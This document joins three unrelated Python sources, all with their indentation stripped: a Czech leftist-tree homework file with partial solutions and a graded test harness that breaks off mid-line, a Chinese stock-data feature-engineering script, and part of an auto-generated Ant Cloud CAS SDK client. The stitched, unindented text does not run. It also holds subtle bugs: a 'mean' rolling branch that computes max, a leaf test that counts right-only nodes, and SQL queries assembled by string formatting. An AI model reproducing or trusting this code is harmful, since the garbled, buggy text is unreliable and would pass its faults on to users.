#
# Vasi prvni ulohou je napsat funkci getLeafsKeys, ktera prida klice
# ze vsech listu zadaneho stromu do pripraveneho seznamu.
#
# Druhou ulohou je napsat funkci, ktera spocita a doplni hodnoty S do uzlu
# zadaneho binarniho stromu.
#
# Treti ulohou je napsat funkci, ktera zkontroluje zda je dany strom
# korektni LTree.
#
# Posledni, ctvrtou ulohou je napsat funkci merge podle algoritmu
# popsanem nize.
#
# Jednotlive funkce jsou bodovany nasledovne:
#
# 1. uloha (10 bodu): getLeafsKeys
# 2. uloha (10 bodu): computeS
# 3. uloha (10 bodu): isCorrectLTree
# 4. uloha (20 bodu): merge
# Struktura pro reprezentaci uzlu stromu LTree.
# 'key' je klic uzlu
# 'S' je hodnota S daneho uzlu.
#
# 'left' je levy syn, tedy atribut typu Node, pokud syn existuje, jinak None
# 'right' analogicky jako left
class Node:
def __init__(self):
self.key = None
self.S = None
self.left = None
self.right = None
# Trida pro reprezentaci LTree
# 'root' je koren stromu a je typu Node, nebo None, pokud je strom prazdny.
class LTree:
def __init__(self):
self.root = None
# Ulozi klice listu zadaneho stromu do pripraveneho seznamu 'list'.
# Poradi klicu v 'list' neni dulezite.
#
# :param 'tree' strom, typu LTree, klice jehoz listu se maji ulozit do seznamu
# :param 'list' seznam, do ktereho se maji pridat klice listu stromu 'tree'
#
# Pro vkladani do list pouzijte funkci append(key), kde 'key' je pridavany klic.
# Jinak list nemodifikujte!
def get_leafs_keys_recursion(node, result_list):
if node is None:
return
if node.left is None and node.right is None:
result_list.append(node.key) # optimalizace: return
if node.left is None and node.right is not None:
result_list.append(node.key) # optimalizace: return
get_leafs_keys_recursion(node.left, result_list)
get_leafs_keys_recursion(node.right, result_list)
def getLeafsKeys(tree, result_list) :
if tree.root is not None:
get_leafs_keys_recursion(tree.root, result_list)
# Spocita a doplni hodnoty S do vsech uzlu stromu tree. Tato funkce by
# mela pracovat pro libovolny binarni strom, tedy bez ohledu na korektnost LTree.
#
# :param 'tree' strom, ve kterem se maji spocitat a nasledne do nej vlozit
# hodnoty S.
def compute_s_recursion(node):
if node is None:
return 0
l = compute_s_recursion(node.left)
r = compute_s_recursion(node.right)
result = min(l, r) + 1
node.S = result
return result
def computeS(tree):
compute_s_recursion(tree.root)
# @brief Overi jestli je strom 'tree' korektni LTree
# :param 'tree' strom, typu LTree, ktery se ma overit
# :return True pokud tree je korektni LTree, jinak False
#
# Pro projiti testu je potreba mit funkci computeS.
# Pred volanim kazdeho testu se vola funkce computeS.
# - Klic uzlu musi byt vzdy mensi nez klice jeho synu.
#
# - Hodnota 'S' je vzdalenost k nejblizsimu "None nasledniku" ve svem podstrome.
# - List (oba synove jsou 'None') ma hodnotu 'S' rovnu 1.
# - Uzel s jednim synem (druhy je tedy 'None') ma hodnotu 'S' rovnu 1.
#
# - Hodnota 'S' leveho syna musi byt vetsi nebo rovna hodnote 'S' praveho syna.
# - Uzel s jednim synem ma jen leveho syna.
#
# Prazdny strom je tedy take LTree.
def is_correct_lt_tree_recursion(node, parent):
if node is None:
return True
if parent is not None and parent.key >= node.key:
return False
if node.left is None and node.right is not None:
return False
return is_correct_lt_tree_recursion(node.left, node) and is_correct_lt_tree_recursion(node.right, node)
def is_correct_s_attribute_recursion(node):
if node is None:
return True, 0
bool_one, l = is_correct_s_attribute_recursion(node.left)
bool_two, r = is_correct_s_attribute_recursion(node.right)
result = min(l, r) + 1
if l < r:
return False, result
if not bool_one or not bool_two:
return False, result
if node.S != result:
return False, result
return True, result
def isCorrectLTree(tree):
if not is_correct_lt_tree_recursion(tree.root, None):
return False
bool_result, number = is_correct_s_attribute_recursion(tree.root)
return bool_result
# @brief Operace merge spoji stromy 'U' a 'V'.
#
# :param 'U' strom, typu LTree, ktery se ma spojit s 'V'
# :param 'V' strom, typu LTree, ktery se ma spojit s 'U'
# :return koren spojeni 'U' a 'V'
#
# ################################################
# Pokud je jeden ze stromu prazdny, funkce vrati koren druheho z nich.
#
# Oznacme si koren 'U' jako 'u' a koren 'V' jako 'v'.
# Pro jednoduchost predpokladejme, ze klic korene 'u' je mensi nez
# klic v koreni 'v', Opacny pripad reste symetricky. Rovnost muzete diky
# unikatnosti klicu ignorovat, nenastava.
#
# Pokud 'u' nema praveho syna, tak se 'v' stane pravym synem 'u'.
# Pokud 'u' ma praveho syna 'w', musime jej nahradit spojenim 'w' a 'v'.
#
# Jestli po spojeni 'w' a 'v' by mel pravy syn 'u' vetsi S nez jeho levy syn,
# musime tyto syny prohodit.
#
# Priklad viz prilozene pdf.
#
# ################################################
# Na vstupu jsou dva korektni LTree 'U' a 'V'.
#
# Vystupem je koren korektniho LTree. Korektni implementace algoritmu popsana vyse
# vede k jednoznacnemu reseni, tedy resenim je pouze jeden konkretni strom.
def merge(U, V) :
#TODO
return None
# ######################################################################
# ## Nasleduje kod testu, NEMODIFIKUJTE JEJ ##
# ######################################################################
"""
Dodatek k graphvizu:
Graphviz je nastroj, ktery vam umozni vizualizaci datovych struktur,
coz se hodi predevsim pro ladeni.
Tento program generuje nekolik souboru neco.dot v mainu
Vygenerovane soubory nahrajte do online nastroje pro zobrazeni graphvizu:
http://sandbox.kidstrythisathome.com/erdos/
nebo http://graphviz-dev.appspot.com/ - zvlada i vetsi grafy
Alternativne si muzete nainstalovat prekladac z jazyka dot do obrazku na svuj pocitac.
"""
def makeGraphviz(node, f):
if (node == None): return
if (node.S is not None):
f.write("%i [label = \"%i\\nS=%i\"]\n" % (node.key, node.key, node.S))
if (node.left is not None):
f.write("%i -> %i\n" % (node.key, node.left.key))
makeGraphviz(node.left, f)
else:
f.write("L{} [label=\"\",color=white]\n{} -> L{}\n".format(id(node), node.key, id(node)))
if (node.right is not None):
f.write("%i -> %i\n" % (node.key, node.right.key))
makeGraphviz(node.right, f)
else:
f.write("R{} [label=\"\",color=white]\n{} -> R{}\n".format(id(node), node.key, id(node)))
def makeGraph(tree, fileName):
f = open(fileName, 'w')
f.write("digraph Tree {\n")
f.write("node [color=lightblue2, style=filled];\n")
if (tree is not None) and (tree.root is not None):
makeGraphviz(tree.root, f)
f.write("}\n")
f.close()
def makeSubtree(s, node) :
leftValue = s.pop(0)
if leftValue is not None :
left = Node()
left.key = leftValue
node.left = left
makeSubtree(s, left)
rightValue = s.pop(0)
if rightValue is not None :
right = Node()
right.key = rightValue
node.right = right
makeSubtree(s, right)
def makeTree(s) :
key = s.pop(0)
if key is None :
return None
root = Node()
root.key = key
makeSubtree(s, root)
return root
def printNodeKeys(node, keys) :
if node is None :
keys.append(None)
return
keys.append(node.key)
printNodeKeys(node.left, keys)
printNodeKeys(node.right, keys)
def printTreeKeys(tree) :
keys = []
printNodeKeys(tree.root, keys)
return keys
def printNodeS(node, SVals) :
if node is None :
SVals.append(None)
return
SVals.append(node.S)
printNodeS(node.left, SVals)
printNodeS(node.right, SVals)
def printTreeS(tree) :
SVals = []
printNodeS(tree.root, SVals)
return SVals
def testgetLeafsKeys() :
TEST_COUNT = 5
treeCodes = [
[10, 20, None, None, None],
[10, None, None],
[None],
[2, 4, 9, None, None, 5, None, None, 6, 8, None, None, 7, None, None],
[2, 4, None, None, 6, None, None]
]
expectedResults = [
[20],
[10],
[],
[5, 7, 8, 9],
[4, 6]
]
checkTrees = [
[10, 20, None, None, None],
[10, None, None],
[None],
[2, 4, 9, None, None, 5, None, None, 6, 8, None, None, 7, None, None],
[2, 4, None, None, 6, None, None]
]
failure = 0
print("Test 1. getLeafsKeys: ")
tree = LTree()
for i in range(TEST_COUNT):
tree.root = makeTree(treeCodes[i])
list = []
getLeafsKeys(tree, list)
list.sort()
if (list != expectedResults[i]) or (printTreeKeys(tree) != checkTrees[i]):
failure = i + 1
break
if failure != 0 :
print("NOK%d | |
import numpy as np
import pandas as pd
import collect as clct
import constants
import db_operations as dbop
def _check_int(arg):
if type(arg) != int:
raise ValueError("{} is not a int".format(arg))
def _check_iterable(arg):
if not hasattr(arg, "__iter__"):
raise ValueError("{} is not iterable".format(arg))
def _make_iterable(arg):
if type(arg) == str or not hasattr(arg, "__iter__"):
return [arg]
else:
return arg
def _prefix(prefix, df: pd.DataFrame, copy=False):
if copy:
df = df.copy()
df.columns = list(map(lambda col: str(prefix) + "_" + col, df.columns))
return df
def _move(days, df: pd.DataFrame, cols=None, prefix=True):
_check_int(days)
if cols is None:
cols = df.columns
cols = _make_iterable(cols)
if days > 0:
pre = "p{}mv".format(abs(days))
df_mv = df[cols].iloc[days:].copy()
df_mv.index = df.index[:-days]
else:
pre = "f{}mv".format(abs(days))
df_mv = df[cols].iloc[:days].copy()
df_mv.index = df.index[-days:]
if prefix:
return _prefix(pre, df_mv)
else:
return df_mv
def _rolling(rolling_type, days, df: pd.DataFrame, cols, move=0,
has_prefix=True):
_check_int(days)
cols = _make_iterable(cols)
period = abs(days)
if rolling_type == "max":
df_rolling = df[cols].rolling(window=abs(days)).max()
elif rolling_type == "min":
df_rolling = df[cols].rolling(window=abs(days)).min()
elif rolling_type == "mean":
df_rolling = df[cols].rolling(window=abs(days)).max()
else:
raise ValueError(
"rolling_type='{}' is not supported.".format(rolling_type))
if move != 0:
df_rolling = _move(move, df_rolling)
n = len(df_rolling)
idxes = df_rolling.index
if days > 0:
pre = "f" + str(abs(days)) + rolling_type
df_rolling = df_rolling.iloc[period - 1:n]
df_rolling.index = idxes[period - 1:n]
else:
pre = "p" + str(abs(days)) + rolling_type
df_rolling = df_rolling.iloc[period - 1:n]
if n - period + 1 >= 0:
df_rolling.index = idxes[:n - period + 1]
if has_prefix:
return _prefix(pre, df_rolling)
else:
return df_rolling
def _rolling_max(days, df: pd.DataFrame, cols, move=0, has_prefix=True):
_check_int(days)
cols = _make_iterable(cols)
period = abs(days)
df_rolling = df[cols].rolling(window=abs(days)).max()
if move != 0:
# print("--------",move)
# print(df_rolling[df["code"] == "600887.SH"]["high"].iloc[:30])
df_rolling = _move(move,
df_rolling) # print(df_rolling[df["code"] == "600887.SH"]["f1mv_high"].iloc[:30])
n = len(df_rolling)
idxes = df_rolling.index
if days > 0:
pre = "f" + str(abs(days)) + "max"
df_rolling = df_rolling.iloc[period - 1:n]
df_rolling.index = idxes[
period - 1:n] # df_rolling = df_rolling.iloc[period-1:n+move] # df_rolling.index = df.index[period-1-move:n]
else:
pre = "p" + str(abs(days)) + "max"
df_rolling = df_rolling.iloc[period - 1:n]
if n - period + 1 >= 0:
df_rolling.index = idxes[:n - period + 1]
# df_rolling = df_rolling.iloc[period-1+move:n] # df_rolling.index = df.index[:n-period+1-move]
if has_prefix:
return _prefix(pre, df_rolling)
else:
return df_rolling
def _rolling_min(days, df: pd.DataFrame, cols, move=0, has_prefix=True):
_check_int(days)
cols = _make_iterable(cols)
period = abs(days)
df_rolling = df[cols].rolling(window=abs(days)).min()
if move != 0:
# print("--------",move)
# print(df_rolling[df["code"] == "600887.SH"]["high"].iloc[:30])
df_rolling = _move(move,
df_rolling) # print(df_rolling[df["code"] == "600887.SH"]["f1mv_high"].iloc[:30])
n = len(df_rolling)
idxes = df_rolling.index
if days > 0:
pre = "f" + str(abs(days)) + "min"
df_rolling = df_rolling.iloc[period - 1:n]
df_rolling.index = idxes[period - 1:n]
else:
pre = "p" + str(abs(days)) + "min"
df_rolling = df_rolling.iloc[period - 1:n]
if n - period + 1 >= 0:
df_rolling.index = idxes[:n - period + 1]
if has_prefix:
return _prefix(pre, df_rolling)
else:
return df_rolling
def _rolling_mean(days, df: pd.DataFrame, cols, move=0, has_prefix=True):
_check_int(days)
cols = _make_iterable(cols)
period = abs(days)
df_rolling = df[cols].rolling(window=abs(days)).mean()
if move != 0:
df_rolling = _move(move, df_rolling)
n = len(df_rolling)
idxes = df_rolling.index
if days > 0:
pre = "f" + str(abs(days)) + "mean"
df_rolling = df_rolling.iloc[period - 1:n]
df_rolling.index = idxes[period - 1:n]
else:
pre = "p" + str(abs(days)) + "mean"
df_rolling = df_rolling.iloc[period - 1:n]
if n - period + 1 >= 0:
df_rolling.index = idxes[:n - period + 1]
if has_prefix:
return _prefix(pre, df_rolling)
else:
return df_rolling
def change_rate(df1: pd.DataFrame, df2: pd.DataFrame, cols1=None, cols2=None):
if cols1:
df1 = df1[cols1].copy()
if cols2:
df2 = df2[cols2].copy()
if df1.shape[1] != df2.shape[1]:
raise ValueError(
"Column length not the same:{0}!={1}".format(df1.shape[1],
df2.shape[1]))
df1 = df1.copy()
df1.columns = df2.columns
df3 = (df2 - df1) / df1
df3 = _prefix("change_rate", df3)
return df3
def create_df(cursor, table_name, start=None):
if start:
sql_select = "select * from {0} where date>='{1}'".format(table_name,
start)
else:
sql_select = "select * from {0}".format(table_name)
cursor.execute(sql_select)
df = pd.DataFrame(cursor.fetchall())
df.columns = dbop.cols_from_cur(cursor)
return df
def prepare_stck_d(df_stck_d):
df_stck_d = df_stck_d.set_index(["date"]).sort_index(ascending=False)
df_stck_d = df_stck_d[
["code", "open", "high", "low", "close", "vol", "amt", "adj_factor"]]
return df_stck_d
def prepare_idx_d(df_idx_d):
df_idx_d = df_idx_d.set_index("date").sort_index(ascending=False)
return df_idx_d
def prepare_each_stck(df_stck, qfq_type="hfq"):
if qfq_type and qfq_type not in ["hfq","qfq"]:
raise ValueError("qfq_type {} is not supported".format(qfq_type))
df_stck = df_stck.copy()
fq_cols = ["open", "high", "low", "close"]
for col in fq_cols:
df_stck[col+"0"] = df_stck[col]
# 后复权
if qfq_type=="qfq":
qfq_factor = np.array(df_stck["adj_factor"]
/ df_stck["adj_factor"].iloc[0])
# print(qfq_factor.shape)
qfq_factor = np.array(df_stck["adj_factor"]).reshape(-1, 1) * np.ones(
(1, len(fq_cols)))
# print(df_stck[fq_cols].dtypes)
# print(qfq_factor.shape, qfq_factor.dtype)
# print(df_stck[fq_cols]/qfq_factor)
df_stck.loc[:, fq_cols] = df_stck[fq_cols] * qfq_factor
return df_stck
def proc_stck_d(df_stck_d, pred_period=10):
df_stck_d = prepare_stck_d(df_stck_d)
df_stck_list = []
cols_move = ["open", "high", "low", "close", "amt"]
cols_roll = ["open", "high", "low", "close", "amt"]
fq_cols = ["open", "high", "low", "close"]
cols_future = None
for code, df in df_stck_d.groupby("code"):
df = df.sort_index(ascending=False)
df = prepare_each_stck(df)
df_label_min = _rolling_min(pred_period, df, "low", move=-1)
df_label_max = _rolling_max(pred_period - 1, df, "high", move=-2)
p1 = (pred_period - 1) // 3
p2 = p1
p3 = pred_period - 1 - p1 - p2
df_label_mean1 = _rolling_mean(p1, df, "open", move=-2)
df_label_mean2 = _rolling_mean(p2, df, "open", move=-2 - p1)
df_label_mean3 = _rolling_mean(p3, df, "open", move=-2 - p1 - p2)
# print(df_label_min.columns)
df_tomorrow = _move(-1, df, ["open", "high", "low", "close"])
# df_label_min = _rolling_min(pred_period,df,"low")
# if code == "000002.SZ":
# tmp = _rolling_min(-5,df,cols_roll).loc["2018-08-07"]
# print(tmp)
df_move_list = [change_rate(df[cols_move], _move(i, df, cols_move)) for
i in range(1, 6)]
df_qfq = df[fq_cols] / df["adj_factor"].iloc[0]
qfq_cols = ["qfq_"+col for col in fq_cols]
df_tomorrow_qfq = _move(-1, df_qfq)
df_rolling_list = [(change_rate(df[cols_roll],
_rolling_max(i, df, cols_roll)),
change_rate(df[cols_roll],
_rolling_min(i, df, cols_roll)),
change_rate(df[cols_roll],
_rolling_mean(i, df, cols_roll))) for i
in [-5, -10, -20, -60, -120, -250]]
df_roll_flat_list = []
for df_rolling_group in df_rolling_list:
df_roll_flat_list.extend(df_rolling_group)
df_labels = pd.concat(
[df_tomorrow,df_tomorrow_qfq, df_label_max, df_label_min, df_label_mean1,
df_label_mean2, df_label_mean3], axis=1, sort=False)
df_stck = pd.concat(
[df,df_qfq] + df_move_list + df_roll_flat_list + [df_labels], axis=1,
sort=False)
df_stck_list.append(df_stck)
if not cols_future:
cols_future = list(df_labels)
# print(tmp.shape)
# print(tmp[tmp[col_label].isnull()])
# if code == "002217.SZ":
# print(df[df.index == "2018-01-02"])
# print(df_stck[df_stck.index == "2018-01-02"])
df_stck_d_all = pd.concat(df_stck_list, sort=False)
# for df in df_stck_list:
# print(df["code"].unique(), df.shape)
# print(df["code"].unique(), df[df.index >= "2018-01-01"].shape)
print("count stck", len(
df_stck_d_all["code"][df_stck_d_all.index >= "2018-01-01"].unique()))
print(df_stck_d_all.shape)
return df_stck_d_all, cols_future
def proc_idx_d(df_idx_d: pd.DataFrame):
df_idx_d = prepare_idx_d(df_idx_d)
cols_move = ["open", "high", "low", "close", "vol"]
cols_roll = cols_move
df_idx_list = []
for name, group in df_idx_d.groupby("code"):
group = group.sort_index(ascending=False)
del group["code"]
df_move_list = [
change_rate(group[cols_move], _move(i, group, cols_move)) for i in
range(1, 6)]
df_rolling_list = [(change_rate(group[["high", "vol"]],
_rolling_max(i, group,
["high", "vol"])),
change_rate(group[["low", "vol"]],
_rolling_min(i, group,
["low", "vol"])),
change_rate(group[["open", "close", "vol"]],
_rolling_mean(i, group,
["open", "close",
"vol"]))) for i in
[-5, -10, -20, -60, -120, -250, -500]]
df_roll_flat_list = []
for df_rolling_group in df_rolling_list:
df_roll_flat_list.extend(df_rolling_group)
tmp_list = [group] + df_move_list + df_roll_flat_list
tmp = pd.concat(tmp_list, axis=1, sort=False)
df_idx_list.append(_prefix(name, tmp))
df_idx_d = pd.concat(df_idx_list, axis=1, sort=False)
return df_idx_d
def prepare_data(cursor, pred_period=10, start=None):
stock_day, index_day = constants.STOCK_DAY[clct.TABLE], constants.INDEX_DAY[
clct.TABLE]
print("start:",start)
df_stck_d = create_df(cursor, stock_day, start)
print("min_date",min(df_stck_d.date))
df_idx_d = create_df(cursor, index_day, start)
df_stck_d_all, cols_future = proc_stck_d(df_stck_d,
pred_period=pred_period)
print(df_stck_d_all.shape)
df_idx_d = proc_idx_d(df_idx_d)
print(df_idx_d.shape, len(df_idx_d.index.unique()))
df_all = df_stck_d_all.join(df_idx_d)
print(df_all.shape)
# print(df_all[(df_all.index == "2018-01-02") & (
# df_all["code"] == "002217.SZ")])
return df_all, cols_future
def feature_select(X, y):
import sklearn.ensemble as ensemble
clf = ensemble.ExtraTreesClassifier(random_state=0)
clf.fit(X, y)
import sklearn.feature_selection as fselect
model = fselect.SelectFromModel(clf, prefit=True)
X_new = model.transform(X)
print("selected feature number:", X_new.shape)
return X_new, model
def main():
db_type = "sqlite3"
#
# conn = dbop.connect_db(db_type)
# cursor = conn.cursor()
#
# pred_period=20
# df_all,cols_future = prepare_data(cursor,pred_period=pred_period,start="2011-01-01")
#
# # test
# # df_test = df_all[df_all["code"]=="600887.SH"]
# # basic_cols = ["open", "high", "low", "close", "amt", "adj_factor"]
# # derived_cols = ['change_rate_p1mv_open', 'change_rate_p1mv_high',
# # 'change_rate_p1mv_low', 'change_rate_p1mv_close',
# # 'change_rate_p1mv_amt', 'change_rate_p3mv_open',
# # 'change_rate_p3mv_high', 'change_rate_p3mv_low',
# # 'change_rate_p3mv_close', 'change_rate_p3mv_amt',
# # 'change_rate_p5mv_open', 'change_rate_p5mv_high',
# # 'change_rate_p5mv_low', 'change_rate_p5mv_close',
# # 'change_rate_p5mv_amt', 'change_rate_p5max_open',
# # 'change_rate_p5max_high', 'change_rate_p5max_low',
# # 'change_rate_p5max_close', 'change_rate_p5max_amt',
# # 'change_rate_p5min_open', 'change_rate_p5min_high',
# # 'change_rate_p5min_low', 'change_rate_p5min_close',
# # 'change_rate_p5min_amt', 'change_rate_p5mean_open',
# # 'change_rate_p5mean_high', 'change_rate_p5mean_low',
# # 'change_rate_p5mean_close', 'change_rate_p5mean_amt',
# # 'change_rate_p20max_open', 'change_rate_p20max_high',
# # 'change_rate_p20max_low', 'change_rate_p20max_close',
# # 'change_rate_p20max_amt', 'change_rate_p20min_open',
# # 'change_rate_p20min_high', 'change_rate_p20min_low',
# # 'change_rate_p20min_close', 'change_rate_p20min_amt',
# # 'change_rate_p20mean_open', 'change_rate_p20mean_high',
# # 'change_rate_p20mean_low', 'change_rate_p20mean_close',
# # 'change_rate_p20mean_amt', 'f1mv_open', 'f1mv_high',
# # 'f1mv_low', 'f1mv_close', 'f20max_f1mv_high',
# # 'sz50_open', 'sz50_high', 'sz50_low', 'sz50_close',
# # 'sz50_vol', 'sz50_change_rate_p1mv_open',
# # 'sz50_change_rate_p1mv_high',
| |
cas_models.ListAppgroupResponse:
"""
Description: 获取应用分组列表
Summary: 获取应用分组列表
"""
UtilClient.validate_model(request)
return cas_models.ListAppgroupResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.list', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def list_appgroup_ex_async(
self,
request: cas_models.ListAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ListAppgroupResponse:
"""
Description: 获取应用分组列表
Summary: 获取应用分组列表
"""
UtilClient.validate_model(request)
return cas_models.ListAppgroupResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.list', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def exist_appgroup(
self,
request: cas_models.ExistAppgroupRequest,
) -> cas_models.ExistAppgroupResponse:
"""
Description: 检查应用分组是否存在
Summary: 检查应用分组是否存在
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.exist_appgroup_ex(request, headers, runtime)
async def exist_appgroup_async(
self,
request: cas_models.ExistAppgroupRequest,
) -> cas_models.ExistAppgroupResponse:
"""
Description: 检查应用分组是否存在
Summary: 检查应用分组是否存在
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.exist_appgroup_ex_async(request, headers, runtime)
def exist_appgroup_ex(
self,
request: cas_models.ExistAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ExistAppgroupResponse:
"""
Description: 检查应用分组是否存在
Summary: 检查应用分组是否存在
"""
UtilClient.validate_model(request)
return cas_models.ExistAppgroupResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.exist', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def exist_appgroup_ex_async(
self,
request: cas_models.ExistAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ExistAppgroupResponse:
"""
Description: 检查应用分组是否存在
Summary: 检查应用分组是否存在
"""
UtilClient.validate_model(request)
return cas_models.ExistAppgroupResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.exist', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def create_appgroup(
self,
request: cas_models.CreateAppgroupRequest,
) -> cas_models.CreateAppgroupResponse:
"""
Description: 创建应用分组
Summary: 创建应用分组
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.create_appgroup_ex(request, headers, runtime)
async def create_appgroup_async(
self,
request: cas_models.CreateAppgroupRequest,
) -> cas_models.CreateAppgroupResponse:
"""
Description: 创建应用分组
Summary: 创建应用分组
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.create_appgroup_ex_async(request, headers, runtime)
def create_appgroup_ex(
self,
request: cas_models.CreateAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.CreateAppgroupResponse:
"""
Description: 创建应用分组
Summary: 创建应用分组
"""
UtilClient.validate_model(request)
return cas_models.CreateAppgroupResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.create', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def create_appgroup_ex_async(
self,
request: cas_models.CreateAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.CreateAppgroupResponse:
"""
Description: 创建应用分组
Summary: 创建应用分组
"""
UtilClient.validate_model(request)
return cas_models.CreateAppgroupResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.create', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def list_appgroup_owner(
self,
request: cas_models.ListAppgroupOwnerRequest,
) -> cas_models.ListAppgroupOwnerResponse:
"""
Description: 获取应用owner列表
Summary: 获取应用owner列表
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.list_appgroup_owner_ex(request, headers, runtime)
async def list_appgroup_owner_async(
self,
request: cas_models.ListAppgroupOwnerRequest,
) -> cas_models.ListAppgroupOwnerResponse:
"""
Description: 获取应用owner列表
Summary: 获取应用owner列表
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.list_appgroup_owner_ex_async(request, headers, runtime)
def list_appgroup_owner_ex(
self,
request: cas_models.ListAppgroupOwnerRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ListAppgroupOwnerResponse:
"""
Description: 获取应用owner列表
Summary: 获取应用owner列表
"""
UtilClient.validate_model(request)
return cas_models.ListAppgroupOwnerResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.owner.list', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def list_appgroup_owner_ex_async(
self,
request: cas_models.ListAppgroupOwnerRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ListAppgroupOwnerResponse:
"""
Description: 获取应用owner列表
Summary: 获取应用owner列表
"""
UtilClient.validate_model(request)
return cas_models.ListAppgroupOwnerResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.owner.list', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def get_appgroup_tree(
self,
request: cas_models.GetAppgroupTreeRequest,
) -> cas_models.GetAppgroupTreeResponse:
"""
Description: 应用分组结构查询
Summary: 应用分组结构查询
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.get_appgroup_tree_ex(request, headers, runtime)
async def get_appgroup_tree_async(
self,
request: cas_models.GetAppgroupTreeRequest,
) -> cas_models.GetAppgroupTreeResponse:
"""
Description: 应用分组结构查询
Summary: 应用分组结构查询
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.get_appgroup_tree_ex_async(request, headers, runtime)
def get_appgroup_tree_ex(
self,
request: cas_models.GetAppgroupTreeRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.GetAppgroupTreeResponse:
"""
Description: 应用分组结构查询
Summary: 应用分组结构查询
"""
UtilClient.validate_model(request)
return cas_models.GetAppgroupTreeResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.tree.get', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def get_appgroup_tree_ex_async(
self,
request: cas_models.GetAppgroupTreeRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.GetAppgroupTreeResponse:
"""
Description: 应用分组结构查询
Summary: 应用分组结构查询
"""
UtilClient.validate_model(request)
return cas_models.GetAppgroupTreeResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.tree.get', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def get_appgroup_systemtree(
self,
request: cas_models.GetAppgroupSystemtreeRequest,
) -> cas_models.GetAppgroupSystemtreeResponse:
"""
Description: 应用分组结构查询
Summary: 应用分组结构查询
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.get_appgroup_systemtree_ex(request, headers, runtime)
async def get_appgroup_systemtree_async(
self,
request: cas_models.GetAppgroupSystemtreeRequest,
) -> cas_models.GetAppgroupSystemtreeResponse:
"""
Description: 应用分组结构查询
Summary: 应用分组结构查询
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.get_appgroup_systemtree_ex_async(request, headers, runtime)
def get_appgroup_systemtree_ex(
self,
request: cas_models.GetAppgroupSystemtreeRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.GetAppgroupSystemtreeResponse:
"""
Description: 应用分组结构查询
Summary: 应用分组结构查询
"""
UtilClient.validate_model(request)
return cas_models.GetAppgroupSystemtreeResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.systemtree.get', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def get_appgroup_systemtree_ex_async(
self,
request: cas_models.GetAppgroupSystemtreeRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.GetAppgroupSystemtreeResponse:
"""
Description: 应用分组结构查询
Summary: 应用分组结构查询
"""
UtilClient.validate_model(request)
return cas_models.GetAppgroupSystemtreeResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.systemtree.get', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def delete_appgroup(
self,
request: cas_models.DeleteAppgroupRequest,
) -> cas_models.DeleteAppgroupResponse:
"""
Description: 删除分组
Summary: 删除分组
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.delete_appgroup_ex(request, headers, runtime)
async def delete_appgroup_async(
self,
request: cas_models.DeleteAppgroupRequest,
) -> cas_models.DeleteAppgroupResponse:
"""
Description: 删除分组
Summary: 删除分组
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.delete_appgroup_ex_async(request, headers, runtime)
def delete_appgroup_ex(
self,
request: cas_models.DeleteAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.DeleteAppgroupResponse:
"""
Description: 删除分组
Summary: 删除分组
"""
UtilClient.validate_model(request)
return cas_models.DeleteAppgroupResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.delete', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def delete_appgroup_ex_async(
self,
request: cas_models.DeleteAppgroupRequest,
